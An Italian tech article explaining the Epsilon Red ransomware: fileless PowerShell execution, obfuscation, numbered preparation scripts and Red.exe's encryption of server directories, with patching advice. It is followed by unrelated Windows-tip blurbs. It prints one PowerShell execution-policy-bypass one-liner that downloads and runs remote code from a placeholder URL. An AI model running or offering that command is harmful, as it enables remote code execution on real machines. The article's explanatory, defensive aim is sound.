Hai già patchato i tuoi server ?
Una nuova minaccia ransomware , denominata Epsilon Red, prende di mira i server basati su Microsoft senza patch nei data center aziendali. Prende il nome da un cattivo poco conosciuto dei fumetti Marvel, Epsilon Red è stato recentemente scoperto da una società di sicurezza informatica chiamata Sophos. Dalla sua scoperta, il ransomware ha attaccato molte organizzazioni in tutto il mondo.
Il ransomware senza file si "nasconde" in PowerShell
Il ransomware fileless è una forma di malware che viene eseguita raggruppando software legittimo. Il malware fileless basato su PowerShell sfrutta la capacità di PowerShell di caricarsi direttamente nella memoria del dispositivo. Questa funzionalità aiuta a proteggere il malware negli script PowerShell dal rilevamento.
In uno scenario tipico, quando viene eseguito uno script, è necessario prima scriverlo sull'unità del dispositivo. Ciò consente alle soluzioni di sicurezza degli endpoint di rilevare gli script. Poiché PowerShell è escluso dai processi di esecuzione degli script standard, può ignorare la sicurezza dell'endpoint. Inoltre, l'utilizzo del parametro bypass in uno script di PowerShell consente a un utente malintenzionato di aggirare le restrizioni sugli script di rete.
Un esempio di parametro di bypass di PowerShell è:
powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))Come puoi vedere, progettare i parametri di bypass di PowerShell è relativamente semplice.
In risposta, Microsoft ha rilasciato una patch per risolvere una vulnerabilità legata all'esecuzione remota di malware correlata a PowerShell. Tuttavia, i cerotti sono efficaci solo nella misura in cui vengono utilizzati. Molte organizzazioni hanno allentato gli standard di applicazione delle patch, rendendo i loro ambienti vulnerabili agli attacchi. Il design di Epsilon Red è quello di sfruttare questo livello di vulnerabilità.
La doppia utilità di Epsilon Red
Poiché Epsilon Red è più efficace contro i server Microsoft senza patch, il malware può essere utilizzato come ransomware e strumento di identificazione. Il fatto che Epsilon abbia successo o meno in un ambiente offre agli aggressori una visione più approfondita delle capacità di sicurezza del loro obiettivo.
Se Epsilon riesce ad accedere a Microsoft Exchange Server, significa che l'organizzazione non sta seguendo le migliori pratiche comuni di sicurezza per l'applicazione delle patch. Per l'aggressore, questo dimostra quanto facilmente il resto dell'ambiente del bersaglio possa essere compromesso da Epsilon.
Epsilon Red usa l'Offuscamento per nascondere il suo carico utile. L'offuscamento rende il codice illeggibile e viene utilizzato nel malware PowerShell per evitare un'elevata leggibilità degli script PowerShell. Con l'offuscamento, i cmdlet degli alias di PowerShell vengono utilizzati per rendere difficile al software antivirus l'identificazione degli script dannosi nei log di PowerShell.
Epsilon Red è più efficace contro i server Microsoft senza patch
Tuttavia, gli script PowerShell offuscati possono ancora essere identificati. Un segno comune di un imminente attacco PowerShell Script è la creazione di un oggetto WebClient. Un utente malintenzionato creerà un oggetto WebClient nel codice PowerShell per stabilire una connessione esterna a un URL remoto contenente codice dannoso.
Se un'organizzazione viene attaccata, la probabilità che disponga di misure di sicurezza sufficienti per rilevare script PowerShell offuscati è molto bassa. Al contrario, se Epsilon Red non riesce a penetrare nel server, ciò indicherà all'aggressore che la rete del bersaglio può decrittografare rapidamente il malware PowerShell, rendendo l'attacco meno prezioso.
Epsilon Red intrusione informatica
La funzionalità di Epsilon Red è molto semplice. Il software utilizza una serie di script Powershell per infiltrarsi nei server. Questi script di PowerShell sono numerati da 1.ps1 a 12.ps1. La progettazione di ogni script di PowerShell consiste nel preparare un server di destinazione per il payload finale.
Tutti gli script PowerShell in Epsilon Red hanno il proprio scopo. Uno degli script PowerShell in Epsilon Red è progettato per risolvere le regole del firewall di rete della destinazione. Un altro software di questa serie progettato per disinstallare il software antivirus del bersaglio .
Come puoi immaginare, questi script funzionano in sincronia per garantire che una volta consegnato il carico utile, il bersaglio non possa interrompere rapidamente il suo progresso.
Trasmettere il carico utile
Una volta che gli script PowerShell di Epsilon hanno lasciato il posto al suo payload finale, viene distribuito come estensione, Red.exe . Quando entra nel server, Red.exe eseguirà la scansione dei file del server e creerà un elenco di percorsi di directory per ogni file rilevato. Dopo aver creato l'elenco, i processi secondari vengono creati dal file malware principale per ciascun percorso di directory nell'elenco. Quindi, ciascun file secondario del ransomware crittografa un percorso di directory dal file di elenco.
Dopo che tutti i percorsi delle cartelle nell'elenco Epson sono stati crittografati, verrà lasciato un file .txt per informare il bersaglio e indicare la richiesta dell'aggressore. Inoltre, tutti i nodi di rete accessibili collegati al server compromesso verranno compromessi e la probabilità che malware entri nella rete potrebbe aumentare.
Chi c'è dietro Epsilon Red?
Le identità degli aggressori dietro Epsilon Red sono ancora sconosciute
Le identità degli aggressori dietro Epsilon Red sono ancora sconosciute. Alcuni indizi però puntano alla provenienza degli aggressori. Il primo indizio è il nome del malware. Epsilon Red è un cattivo degli X-Men con una storia di origini russe.
Il secondo indizio si trova nella richiesta di riscatto del file .txt lasciato dal codice. È simile alla nota lasciata da una banda di ransomware chiamata REvil. Tuttavia, questa somiglianza non indica che gli aggressori fossero membri di questa banda. REvil gestisce un'operazione RaaS (Ransomware as a service) in cui gli affiliati pagano REvil per l'accesso al suo malware.
Proteggiti da Epsilon Red
Finora, Epsilon Red è riuscito a penetrare nei server senza patch. Ciò significa che una delle migliori protezioni contro Epsilon Red e malware ransomware simili è garantire che il tuo ambiente sia gestito correttamente. Inoltre, disporre di una soluzione di sicurezza in grado di decrittografare rapidamente gli script PowerShell sarebbe un'utile aggiunta al tuo ambiente.
Questa è la prima build di Windows 10 di Microsoft nel 2018 per il programma Windows Insider rilasciata agli utenti del ramo Fast Ring (incluso Skip Ahead). Windows 10 build 17074 presenta molti miglioramenti al sistema operativo che non sono inferiori alla build finale del 2017.
Disattiva le applicazioni che si avviano nel sistema, rimuovi programmi e applicazioni inutilizzati, pulisci Bloatware... per rendere il tuo computer Windows 10 più fluido e veloce.
Se stai esaurendo lo spazio sul disco rigido e non sei disposto a spendere più soldi per l'aggiornamento, la compressione dei dati sarà utile per liberare spazio sul disco rigido e lo strumento migliore per questo è CompactGUI.
Uno dei compiti più importanti nella gestione della rete è IPAM, che sta per IP Address Management. Ogni applicazione e dispositivo sulla rete dipende dall'IP e richiede l'assegnazione di un indirizzo.
Istruzioni su come trovare ed eliminare file duplicati sul computer utilizzando le applicazioni più popolari, contribuendo a liberare spazio su disco nel sistema.
Il sistema operativo Windows Defender sul sistema operativo Windows 10 Creators è stato aggiornato e l'interfaccia è stata modificata in Windows Defender Security Center. E gli utenti possono abilitare la funzionalità Windows Defender Offline su Windows 10 Creators.
Windows 10 offre una miriade di funzionalità che aiutano gli utenti a organizzare facilmente le applicazioni e il multitasking.
Nell'articolo precedente ti abbiamo mostrato come installare e attivare la versione gratuita del software antivirus Kaspersky. Tuttavia, poiché si tratta di una versione rilasciata solo in Russia e Ucraina, la lingua utilizzata sarà anche il russo, il che ne rende difficile l'utilizzo.
Sul tuo computer Windows 10 hai installato un sacco di temi e desideri eliminare quelli che non usi più per fare spazio ai nuovi temi che desideri scaricare. Nell'articolo seguente, LuckyTemplates ti guiderà attraverso 3 modi per visualizzare ed eliminare temi o pacchetti di temi che hai installato sul tuo computer Windows 10.
Su Windows 10 è possibile abilitare la funzionalità Notifiche di riavvio aggiornamento. Quando la funzione Aggiorna notifiche di riavvio è abilitata, il sistema operativo memorizzerà le notifiche dell'ora di riavvio. Le notifiche verranno visualizzate più frequentemente, quindi non dimenticherai l'ora in cui il sistema operativo si riavvierà.
